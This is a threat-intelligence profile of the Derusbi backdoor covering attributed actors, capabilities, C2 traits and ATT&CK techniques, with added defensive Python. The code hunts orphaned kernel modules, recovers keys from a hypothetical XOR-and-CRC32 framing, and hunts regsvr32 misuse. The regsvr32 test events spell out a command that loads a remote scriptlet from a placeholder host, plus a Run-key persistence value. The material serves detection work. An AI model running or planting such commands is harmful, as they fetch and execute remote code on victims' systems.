Derusbi
Derusbi (also tracked as Photo/PHOTO) is a stealthy, versatile backdoor/RAT family associated with multiple Chinese threat activity clusters since at least 2008 and frequently linked to advanced persistent threat operations against high-value targets. The sources collected here associate it with APT40, Deep Panda, Earth Lusca (whose SprySOCKS backdoor is reported to draw on Derusbi), and Wicked Panda/APT41, and record its use for espionage, data theft, and broader system compromise.
Observed capabilities include screen, video, and audio capture, an interactive shell, file and directory operations, file deletion, Registry key and value enumeration, username collection, and timestomping; the sources also tie it to keylogging tooling from the same ecosystem. A Linux variant checks whether its effective user ID is root and refuses to run otherwise, and it collects the victim username. One Linux variant was observed loading a Linux kernel module and then removing the module file from disk, overwriting it with null bytes as it did so.
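The loaded-then-deleted kernel module leaves a gap that is cheap to hunt for: a module that the kernel reports in /proc/modules but that has no backing file under /lib/modules for the running kernel. The Python below is an added example, not Derusbi code or any vendor's detection. The /proc/modules column layout is the real kernel format; the sample contents, the module name hidemod, and the on-disk inventory SAMPLE_ON_DISK are constructed.

```python
"""Hunt for a loaded kernel module whose file is gone from disk (added example)."""
import os
from pathlib import Path

# Constructed /proc/modules excerpt. Real columns: name size refcount deps state addr [taint]
SAMPLE_PROC_MODULES = """\
nf_tables 245760 2 nft_compat,nft_chain_nat, Live 0xffffffffc0a00000
xt_conntrack 16384 1 - Live 0xffffffffc09f0000
hidemod 20480 0 - Live 0xffffffffc0b10000 (OE)
ext4 950272 1 - Live 0xffffffffc0100000
"""
# Constructed inventory of module names present under /lib/modules/<release>/
SAMPLE_ON_DISK = {"nf_tables", "xt_conntrack", "ext4", "nft_compat", "nft_chain_nat"}


def parse_proc_modules(text):
    """Parse /proc/modules into dicts; the taint column ('(OE)' etc.) is optional."""
    mods = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5:
            continue
        deps = parts[3]
        mods.append({
            "name": parts[0],
            "size": int(parts[1]),
            "refcount": int(parts[2]),
            "deps": [] if deps == "-" else deps.strip(",").split(","),
            "taint": parts[6] if len(parts) > 6 else "",
        })
    return mods


def module_file_stems(modules_dir):
    """Names of modules shipped on disk, tolerating compressed files (.ko.xz, .ko.zst)
    and the hyphen/underscore difference between file names and module names."""
    stems = set()
    for p in Path(modules_dir).rglob("*.ko*"):
        stems.add(p.name.split(".ko")[0].replace("-", "_"))
    return stems


def find_orphan_modules(proc_modules_text, on_disk_stems):
    """Loaded modules with no file on disk, or tainted as out-of-tree (O) / unsigned (E)."""
    findings = []
    for m in parse_proc_modules(proc_modules_text):
        reasons = []
        if m["name"].replace("-", "_") not in on_disk_stems:
            reasons.append("no module file on disk")
        if "O" in m["taint"] or "E" in m["taint"]:
            reasons.append(f"taint flags {m['taint']}")
        if reasons:
            findings.append((m["name"], reasons))
    return findings


def live_check():
    """Run against the current host (needs read access to /proc/modules and /lib/modules)."""
    release = os.uname().release
    with open("/proc/modules") as fh:
        text = fh.read()
    return find_orphan_modules(text, module_file_stems(f"/lib/modules/{release}"))


if __name__ == "__main__":
    for name, reasons in find_orphan_modules(SAMPLE_PROC_MODULES, SAMPLE_ON_DISK):
        print(f"{name}: {'; '.join(reasons)}")
    if os.path.exists("/proc/modules"):
        print("live:", live_check())
```

An out-of-tree or unsigned taint on its own is weak evidence (DKMS-built drivers trip it too); the combination with a missing file is the signal. A rootkit that also hides itself from /proc/modules will not show up here, so cross-check with /sys/module and kernel logs where you can.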
Stealth and persistence rely on several mechanisms: process injection, encrypted or obfuscated communications, service creation, driver loading, DLL side-loading, lateral movement via removable drives, and Registry persistence that proxies execution through regsvr32.exe. Deep Panda reportedly used regsvr32.exe to execute a server variant of Derusbi.
Network and C2 characteristics include unencrypted HTTP carried over TCP port 443, binding a raw socket on a random source port between 31800 and 31900 for C2, and obfuscation of C2 traffic with variable 4-byte XOR keys. A separately analyzed Derusbi-linked architecture used kernel/userland separation, named-pipe IPC, an XOR-obfuscated configuration, optional LZO compression, and CRC32 checksums, and supported up to eight C2 entries.
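To make the XOR and CRC32 details concrete, here is an added example with a hypothetical frame layout: a per-message 4-byte key, a CRC32 over the plaintext, and a body XORed with that key behind a fixed MSG1 magic. It is not Derusbi's real protocol; the field order, the magic, the beacon text and the key are assumptions. What it shows is why a variable 4-byte key is obfuscation rather than encryption: any four known plaintext bytes at a known offset recover the key, and a transmitted checksum lets an analyst confirm a candidate key even when the crib's offset is unknown.

```python
"""Hypothetical 4-byte-XOR + CRC32 framing and key recovery (added example, not Derusbi's format)."""
import os
import struct
import zlib
from typing import Optional

MAGIC = b"MSG1"  # assumed fixed plaintext header; a crib like this is what an analyst relies on


def xor4(data: bytes, key: bytes, start: int = 0) -> bytes:
    """XOR `data` with a 4-byte key. `start` is the offset of data[0] in the full
    stream so that a slice decodes with the same keystream alignment."""
    if len(key) != 4:
        raise ValueError("key must be exactly 4 bytes")
    return bytes(b ^ key[(start + i) % 4] for i, b in enumerate(data))


def build_frame(payload: bytes, key: Optional[bytes] = None) -> bytes:
    """Assumed layout: key(4) | crc32(plaintext) little-endian(4) | xor4(MAGIC + payload).
    A fresh random key per message is what 'variable XOR key' means on the wire."""
    key = key or os.urandom(4)
    plain = MAGIC + payload
    return key + struct.pack("<I", zlib.crc32(plain)) + xor4(plain, key)


def parse_frame(frame: bytes) -> bytes:
    """Decode a frame, rejecting it when the CRC32 or magic does not match."""
    if len(frame) < 8 + len(MAGIC):
        raise ValueError("frame too short")
    key = frame[:4]
    (crc,) = struct.unpack("<I", frame[4:8])
    plain = xor4(frame[8:], key)
    if zlib.crc32(plain) != crc or not plain.startswith(MAGIC):
        raise ValueError("bad frame: CRC32 or magic mismatch (wrong key or corruption)")
    return plain[len(MAGIC):]


def recover_key_from_crib(body: bytes, crib: bytes, offset: int) -> bytes:
    """Known-plaintext recovery. If `crib` sits at plaintext `offset`, then
    key[(offset + i) % 4] = body[offset + i] ^ crib[i]; four crib bytes fix the
    whole key at any offset, because only the alignment mod 4 matters."""
    if len(crib) < 4 or offset + 4 > len(body):
        raise ValueError("need 4 crib bytes inside the body")
    key = bytearray(4)
    for i in range(4):
        key[(offset + i) % 4] = body[offset + i] ^ crib[i]
    return bytes(key)


def recover_key_by_crc(body: bytes, crc: int, crib: bytes, max_offset: int = 64) -> Optional[bytes]:
    """Crib position unknown: slide it over the first `max_offset` positions and keep
    the candidate whose full decryption matches the transmitted CRC32."""
    for offset in range(min(max_offset, len(body) - 4 + 1)):
        cand = recover_key_from_crib(body, crib, offset)
        if zlib.crc32(xor4(body, cand)) == crc:
            return cand
    return None


if __name__ == "__main__":
    # Constructed beacon and key, for demonstration only.
    key = b"\x13\x37\xca\xfe"
    frame = build_frame(b"beacon host=WS01 user=alice", key)
    body = frame[8:]
    print("decoded:", parse_frame(frame))
    print("key from MAGIC at 0:", recover_key_from_crib(body, MAGIC, 0).hex())
    print("key from 'host' at 11:", recover_key_from_crib(body, b"host", 11).hex())
    (crc,) = struct.unpack("<I", frame[4:8])
    print("key via CRC sweep:", recover_key_by_crc(body, crc, b"user=").hex())
```

The CRC32 here is an integrity check, not an authenticator: anyone who recovers the key can forge frames that validate, which is exactly what makes such a channel worth emulating in a lab once the real layout is known.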
Additional reporting describes a Windows x64 rootkit/driver component in the Derusbi ecosystem that was signed with stolen legitimate certificates, disabled the kernel debugger, hid network connections and files, injected an encrypted userland DLL directly into a SYSTEM svchost.exe from kernel memory, and used named pipes for kernel-to-userland communication. The userland component was modular, supporting command execution, proxying, remote desktop, file operations, VPN-related functionality, and uninstall/disconnect features. The same reporting described a Linux userland library consistent with Derusbi server behavior and an embedded Linux kernel module that hid RAT traffic and accepted packets destined for a specific port range.
Known aliases in the content are Derusbi and Photo/PHOTO.
Vulnerabilities exploited
4 CVEs Mallory has correlated with this family across public research and vendor advisories.
PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.
Groups observed using it
4 distinct threat actors attributed by public researchers.
The group uses a variety of TTPs including but not limited to LoTL tactics, phishing, ransomware, cryptocurrency mining, supply chain attacks, China Chopper, Gh0st RaT, PlugX, HighNoon, Derusbi, BioPass RAT, RedXOR, and ShadowPad.
Tools: Nanhaishu, Orz, SeDll, Cobalt Strike, GreenCrash, AIRBREAK, BlackCoffee, China Chopper, FUSIONBLAZE, HOMEFRY, MURKYTOP, Metasploit / Meterpreter, ScanBox, Derusbi Trojan, Derusbi, Metasploit
Derusbi variants have been seen that use Registry persistence to proxy execution through regsvr32.exe.
Techniques & procedures
28 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access (2 techniques)
Execution (1 technique)
Persistence (4 techniques)
"APT40 relies heavily on web shells for an initial foothold... provide continued access... re-infect... and facilitate lateral movement."
Utilize behavioral analytics and endpoint detection tools to identify indicators such as persistence, service creation, lateral movement via removable drive, driver loading, and DLL side-loading.
Privilege Escalation (5 techniques)
Known for its adaptability, it employs techniques like process injection and encrypted communications to evade detection.
Stealth (7 techniques)
Examples throughout the content include deleting tools, logs, malware-related files, staged archives, screenshots, temporary files, and exfiltrated data 'to cover their tracks,' 'reduce their footprint,' 'remove traces of activity,' or as part of 'post-intrusion cleanup.'
The content repeatedly describes adversaries and malware deleting files, directories, droppers, scripts, logs, archives, staged data, and other artifacts from compromised systems, e.g., 'APT29 has used SDelete to remove artifacts from victim networks' and 'Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim.'
The content also includes secure deletion and overwrite behavior, e.g., 'APT29 has used SDelete to remove artifacts,' 'GreyEnergy can securely delete a file,' 'LiteDuke can securely delete files by first writing random data to the file,' and 'PowerDuke has a command to write random data across a file and delete it.'
APT28 has performed timestomping on victim files. APT29 has used timestomping to alter the Standard Information timestamps on their web shells to match other files in the same directory. APT32 has used scheduled task raw XML with a backdated timestamp... APT38 has modified data timestamps to mimic files that are in the same folder on a compromised host.
AppleSeed can call regsvr32.exe for execution. APT19 used Regsvr32 to bypass application control techniques. APT32 created a Scheduled Task/Job that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory. ... Raspberry Robin uses regsvr32.exe execution without any command line parameters for command and control requests to IP addresses associated with Tor nodes.
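The regsvr32.exe proxy-execution patterns collected in this section (a Run-key value that invokes regsvr32.exe, an /i: argument pointing at a remote scriptlet, a DLL registered from a user-writable path, and a launch with no arguments at all) can be hunted in process-creation and Registry telemetry. The Python below is an added example, not a vendor rule or Derusbi-specific signature. The events are constructed Sysmon-style records, and the field names (type, image, cmdline, parent, key, value, data) are an assumption about how a SIEM normalizes them; the IP is a documentation-range address.

```python
"""Hunt regsvr32.exe proxy execution in process and Registry events (added example)."""
import re

# DLL paths that regsvr32 legitimately registers from; anything else gets flagged.
SAFE_DLL_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)

# Constructed events; field names are an assumption about your SIEM's schema.
EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll",
     "parent": r"C:\Windows\System32\msiexec.exe"},
    {"type": "process", "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r'"C:\Windows\SysWOW64\regsvr32.exe" /s "C:\Users\alice\AppData\Roaming\svc\module.dll"',
     "parent": r"C:\Windows\explorer.exe"},
    {"type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe", "parent": r"C:\Windows\System32\rundll32.exe"},
    {"type": "registry", "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "value": "Updater", "data": r'regsvr32.exe /s "C:\ProgramData\upd\upd.dll"'},
    {"type": "registry", "key": r"HKLM\SYSTEM\CurrentControlSet\Services\wuauserv",
     "value": "ImagePath", "data": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]


def tokenize(cmdline):
    """Split a Windows command line on whitespace while keeping quoted paths whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def assess_regsvr32_cmdline(cmdline):
    """Reasons a regsvr32.exe command line deserves a look; empty list means benign."""
    args = tokenize(cmdline)[1:]
    reasons = []
    if not args:
        reasons.append("launched with no arguments (nothing to register)")
    for arg in args:
        low = arg.lower()
        if low[:1] in ("/", "-") and low[1:].startswith("i:"):
            target = low[3:]
            if target.startswith(("http://", "https://", "\\\\")) or target.endswith(".sct"):
                reasons.append(f"/i: target is remote or a scriptlet: {arg[3:]}")
        elif low == "scrobj.dll":
            reasons.append("scrobj.dll named as the DLL (COM scriptlet host)")
        elif low.endswith(".dll") and "\\" in low and not low.startswith(SAFE_DLL_PREFIXES):
            reasons.append(f"DLL outside system/program directories: {arg}")
    return reasons


def hunt(events):
    """Return (subject, reasons) for regsvr32 process launches and autorun values."""
    findings = []
    for ev in events:
        if ev["type"] == "process" and ev["image"].lower().endswith("\\regsvr32.exe"):
            reasons = assess_regsvr32_cmdline(ev["cmdline"])
            if reasons:
                findings.append((ev["cmdline"], reasons))
        elif (ev["type"] == "registry" and "regsvr32" in ev["data"].lower()
              and re.search(r"\\run(once)?$", ev["key"], re.IGNORECASE)):
            findings.append((f'{ev["key"]}\\{ev["value"]}',
                             ["autorun value proxies execution through regsvr32.exe"]))
    return findings


if __name__ == "__main__":
    for subject, reasons in hunt(EVENTS):
        print(subject, "->", "; ".join(reasons))
```

The benign msxml3.dll registration from msiexec.exe is deliberately left unflagged; tuning lives in SAFE_DLL_PREFIXES and in whatever parent-process allow-list your installers justify. Registry persistence that points regsvr32 at a DLL only shows up if you collect Run/RunOnce value writes, so pair the Registry branch with a registry-set event source.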
Discovery (6 techniques)
The content repeatedly describes malware and threat actors querying, enumerating, searching, reading, or checking Windows Registry keys and values, e.g., "ADVSTORESHELL can enumerate registry keys," "APT41 queried registry values to determine items such as configured RDP ports and network configurations," and "Reg may be used to gather details from the Windows Registry of a local or remote system at the command-line interface."
The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking whether the current user is an administrator, enumerating user sessions, and gathering account details from compromised hosts.
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
The content notes checks for whether the current user is an administrator or privileged, including 'AsyncRAT can check if the current user of a compromised system is an administrator,' 'Gelsemium has the ability to distinguish between a standard user and an administrator,' and 'Wizard Spider has used whoami to identify the local user and their privileges.'
The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."
The content repeatedly describes malware and threat actors listing files and directories, enumerating drives, searching for files by extension/name/path, retrieving file metadata, and browsing file systems (for example: "APT28 has used Forfiles to locate PDF, Excel, and Word documents during collection" and "cmd can be used to find files and directories with native functionality such as dir commands").
Lateral Movement (1 technique)
Collection (3 techniques)
"Agent Tesla can capture screenshots of the victim’s desktop"; "AppleSeed can take screenshots on a compromised host"; "APT28 has used tools to take screenshots from victims"; "Cobalt Strike's Beacon payload is capable of capturing screenshots"; "PowerSploit's Get-TimedScreenshot Exfiltration module can take screenshots at regular intervals"; "Hydraq includes a component based on the code of VNC that can stream a live feed of the desktop"
Command and Control (5 techniques)
"Common TCP ports 80 and 443 are used to blend in with routine network traffic."
"3PARA RAT command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode..."; "APT33 has used AES for encryption of command and control traffic."; "Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode)."; "Duqu ... data stream can be encrypted with AES-CBC."; "PoisonIvy uses the Camellia cipher to encrypt communications."
Recent activity
40 sources tracked across advisories, community write-ups, and news.
Derusbi is listed as malware relevant to the detection's analytic stories, implying possible use of DLL side-loading or related tradecraft. No further description is provided in the content.
Derusbi is referenced as a backdoor/RAT in suspicious execution and driver-loading detections.